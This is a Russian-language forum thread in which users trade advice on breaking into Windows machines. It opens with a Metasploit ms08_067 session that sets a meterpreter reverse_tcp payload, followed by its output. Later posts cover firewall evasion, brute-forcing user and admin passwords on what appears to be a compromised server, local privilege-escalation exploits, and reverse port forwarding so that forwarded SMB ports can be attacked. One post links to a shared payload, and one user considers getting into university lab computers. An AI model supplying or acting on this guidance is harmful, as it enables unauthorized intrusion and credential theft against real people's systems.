Тестирую этот эксплоит на чистой win xp sp2. Вот если фаер отключен, то все работает, а когда включаю, то коннекттаймаут. msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3 RHOST => 192.168.0.3 msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set LHOST 192.168.0.1 LHOST => 192.168.0.1 msf exploit(ms08_067_netapi) > exploit [*] Started reverse TCP handler on 192.168.0.1:4444 [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445). [*] Exploit completed, but no session was created. Можно ли как-то обойти это при включенном фаерволе ? Какой бы еще попробовать эксплойт. Пробовал через armitage в кали, там автоматический пробивал через ms08-67 систему, но с включенным фаером ни один сплойт, из тех, что armitage подбирает, не проходят.
А можно как-то обойти это при условии что есть рдп доступ к машине юзерского аккуанта, то есть фаер отключить не смогу. Но что-то типа multi handler применить если, так не прокатит ? Еще заодно вопрос про windows server 2003 r2 sp2, поставил такой на виртуалку, 445 порт открыт, но сплойт выдает, что [*] Automatically detecting the target...[*] Fingerprint: Windows 2003 Service Pack 2 - lang:Unknown[*] Could not determine the exact language pack[*] Exploit completed, but no session was created. Правильно, что все r2 серваки этой атаке не подвержены ? Просто в списке уязвимых машин есть Windows 2003 SP2 English (NX) списки такого вида, но r2 нету в том списке, или тут sp2 если уязвима, то r2 тоже ?
Можно в фаерволе добавить правило, которое к нужному порту разрешит доступ. Я давно метасплойт не юзал, но в последнем случае скорее всего версия ОС на машине просто не подвержена уязвимости.
А каким бы компилятором можно под винду перекомпилить исходники локальных эксплойтов, хочу пересобрать эксплойты локальные для повышения прав. (который отсюда exploit\local\windows)Но если брать visual studio, то она найдет кучу ошибок и придется каждый править, подскажите компилятор, который переваривает нормально этот синтаксис. Идея в том, чтобы не возиться с multi handler, а сразу запускать их из винды. Кстати с multi handler тоже есть проблемы, в локалке все норм, а во внешней сети облом из-за того что нет прямого ип, а только серый вида 192.168.*.* Вот нашел их на гитхаб, https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/windows/local У них синатксис не совсем сишный, поэтому конвертер хотя бы для них найти, чтобы в си, а потом наверно gcc можно компиль использовать.
Эти эксплойты на руби написаны, и они идут как часть msf а не самостоятельные программы. Вообще такого рода вопросы можно на форуме метасплойта и задавать.
Если есть юзерский аккаунт, можно с него попробовать пробрутить админский. Если брут не прокатит, ещё можно от юзера по реверсу пробросить 139/tcp и 445/tcp порты, куда-то. И msf-ом атаковать уже проброшенные порты. Дальше вопрос только в том, чтобы начинка дала бэк-коннект на правильный IP и порт.
Обычно через nt-passworder ставлю на 5-7 цифр бруты, на одном дедике у многих юзеров оказались пассы 4,5 цифр, а админы не поддались. Интересно почему так, юзеры у админов просят простые им пассы ставить ? А сами админы себе видать сложное ставят. Ну вот такая идея как раз о пробросе я и думал, но это я так понимаю нужно в роутер попасть. Кстати на 2008 и 7 прокатывали локальные эксплойты kitapr0d, ms16-032, potato, flatenrec, taihou64 это вот то что вспомнил, вроде еще какие-то пробовал. А на 2003 чет не получается, которые с r2 sp2. Может кто делал подборку эксплойтов собранных для повышения прав, заметил, что в exploit-db эти эксплойты часто надо доправлять по мелким ошибкам, к примеру, многие там почему-то забывают выделять память указателям структур)
Лучше брутить словарём, цифровые пароли на Windows юзеры ставят реже. Нет, речь идёт о реверс-соединении к портам, используя различные реверсеры, либо встроенную возможность начинки meterpreter (там есть команда portfwd, начинка входит в состав msf). Хороший выбор. KiTrap0D на NT 5.1 и 5.2 срабатывает практически всегда.
Проблема в том что nt passworder не поддерживает словари, какую бы взять прогу, где словари можно было бы. Чтобы также из под юзера можно было бы поставить брут. Еще вспомнил про multi handler, из-за серого ипишника 192.168 как бы настроить его.
Попробуйте это: http://rgho.st/6CHz9D4tb Одна из моих старых частично заброшенных разработок. Если память не подводит, эту начинку ещё не испытывал.
Это когда есть доступ к машине, то генерируешь бэкдор в метасплойт и его там запускаешь, он открывает сессию для метасплойта. А дальше можно вызывать локальные эксплойты из метасплойта, но из-за серого ip походу проще перекомпилить их в экзешники и притащить туда. Тут еще про удаленные компы, вот заметил в универе класс компов, туда в учетки преподы заходят по логину-пассу корпоративной почты. Но в lusrmgr.msc их логинов нету, а папки в users их есть, винда 7, вот как их так спрятали интересно. В net user их тоже нету. А dsa.msc не открылась на тех компах, думал доменные юзеры.
Не проще. Потому что эксплойты msf для этого просто не предназначены, они зависят от множества внутренних интерфейсов, предоставляемых фреймворком. Реальный вариант - искать C/C+ исходники этих же эксплойтов, либо уже скомпилированные программы.